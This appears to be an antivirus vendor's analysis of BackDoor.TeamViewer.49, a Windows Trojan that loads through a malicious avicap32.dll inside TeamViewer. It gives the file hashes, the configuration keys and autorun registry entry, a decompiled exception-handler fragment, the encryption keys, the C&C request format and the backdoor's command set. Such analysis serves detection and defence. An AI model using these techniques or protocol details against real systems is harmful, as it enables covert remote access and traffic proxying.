SHA1:
- 9649ef7b594794daaf02da08c3b95a9f2f71149b (avicap32.dll)
- 4884d44e2b4c2e2a65472068ef748f51385b13de (payload)
A Trojan for Microsoft Windows that is spread by Trojan.MulDrop6.39120. The Trojan's main payload is incorporated into the avicap32.dll library. Trojan.MulDrop6.39120 runs TeamViewer that automatically loads the library to the computer’s memory. All lines, imports, and functions of TeamViewer’s process are actively implemented by this malicious library. The most critical parts of the Trojan’s code are encrypted with base64 and RC4.
When running, the Trojan removes the icon of TeamViewer from the Windows notification area and disables error reporting. BackDoor.TeamViewer.49 also intercepts calls for some system functions to hide the TeamViewer window.
The Trojan determines the value of the HKLM\Software\Microsoft\Cryptography\MachineGUID system registry parameter and calculates MD5. The result of the calculation is the RC4 key and a name of the mutex that is used to control restart of the Trojan. In addition, the backdoor generates a global RC4 key using one of the TeamViewer functions.
BackDoor.TeamViewer.49 uses the configuration file named nv8moxflu that is located in the same directory as the Trojan itself. The first byte of the configuration file is a flag that specifies the encryption algorithm: if the byte equals to 1, the global key is used; if it is 0—the local one. Other information is encrypted with RC4. The configuration file of the examined sample looks as follows:
Section {Main}
szsubKey "SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
szvalueName "5s"
szpgkey "rtpredimpku0hrq1le0d4cwqw7pcl97dv"
szadminkey "i9igmhtliih115b5xlbpcwwc17qlbhse4"
SectionEnd
To decrypt other code blocks, the backdoor uses the MD5 value obtained from the “szadminkey” parameter. Then it parses the “Main” section of the configuration file, retrieves all parameters, and replaces the original file with its copy encrypted with the local key.
The Trojan launches a separate thread that, operating in infinite loop but with specified time intervals, assigns the folder, which contains its executable file, the malicious library and the configuration file, with the “hidden” and “system” attributes. If it fails to assign these attributes, the Trojan starts removing all the TeamViewer keys from the system registry.
HKCU\\Software\\TeamViewer\\Version6\\MachineFallback
HKCU\\Software\\TeamViewer\\Version6
HKCU\\Software\\TeamViewer
The backdoor registers itself in autorun intercepting calls for the hookRegOpenKeyExW function.
Then it installs Vectored Exception Handler and break points (0xcc) at the addresses of 0x5A7A84 and the MessageBoxW function.
To exclude such error codes as 0xC0000005 (STATUS_ACCESS_VIOLATION), 0xC0000374 (STATUS_HEAP_CORRUPTION), and 0x80000004 (STATUS_SINGLE_STEP), the following code is executed:
ContextRecord->SegDs = 35;
ContextRecord->EFlags |= 0x100u;
return EXCEPTION_CONTINUE_EXECUTION;
To exclude 0x80000003 (STATUS_BREAKPOINT), the Trojan first checks the address to which connection was established. If the address is 0x5A7A84, interception of the function call is set to the address that TeamViewer uses to call for WinVerifyTrust (dynamically-obtained import). The interception always returns “1”, which means “the signature is invalid”. Besides, the Trojan checks whether the exclusion address coincides with the MessageBoxW function address. If it does, the backdoor replaces the value of the EIP registry with its LoadEmbLib function and quits the exception handler.
The Trojan’s body contains one more encrypted library responsible for performing malicious activity. It is written in C++ using the boost library. The additional library is decrypted with the RC4 algorithm. The key is obtained from the szpgkey parameter of the configuration file. Then the library is loaded to the memory.
This library contains a specially-generated array that represents names of the server. The names are stored by bytes and are encrypted with the 0x18 byte using XOR.
When trying to connect, the backdoor uses User-Agent:
Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
The following line is generated:
client_id=%.8x&connected=0&server_port=0&debug=0
where client_id is a serial number of the hard drive that stores the C section, The value is encrypted with the XOR operation using SID.
This line is encrypted with the “heyfg645fdhwi” RC4 key and is then encoded with bintohex. After that, the line is sent to the server as the following request:
http://<cnc>/analytics.php?c=<encoded_data>
The server’s reply is encoded with bintohex and is encrypted with RC4 as well.
The Trojan can execute the following commands received over HTTPS:
- disconnect—terminate the connection;
- idle—maintain the connection;
- updips—update the auth_ip list with the one specified in the command received;
- connect—connect to the specified host server. The command must consist of the following parameters:
- ip—host server’s IP address;
- auth_swith—use authorization. If the value is set to “1”, the Trojan receives the auth_login and auth_pass parameters. If the value is “0”, the Trojan gets the auth_ip parameter. Otherwise, the connection will not be established.
- auth_ip—IP authentication;
- auth_login—login;
- auth_pass—password.
Other network activity is written using boost::asio::stream_socket_service and is performed via a binary protocol.
The Trojan can execute the following commands received over the binary protocol:
- Authentication—depending on the auth_swith parameter, the Trojan sends either data on the auth_ip parameter or auth_login and auth_pass.
- Keep-Alive (0x01)—maintains the connection to the server.
- Send Data (0x02)—searches for the signature in the Trojan’s body:
and sends the number of bytes specified by the server.C8 1F 0E 8D 4A 97 06 2A BC B8 3A D0 30 92 2E 59
- Proxy (0x00)—redirects traffic from the C&C server to the remote host server specified by the server.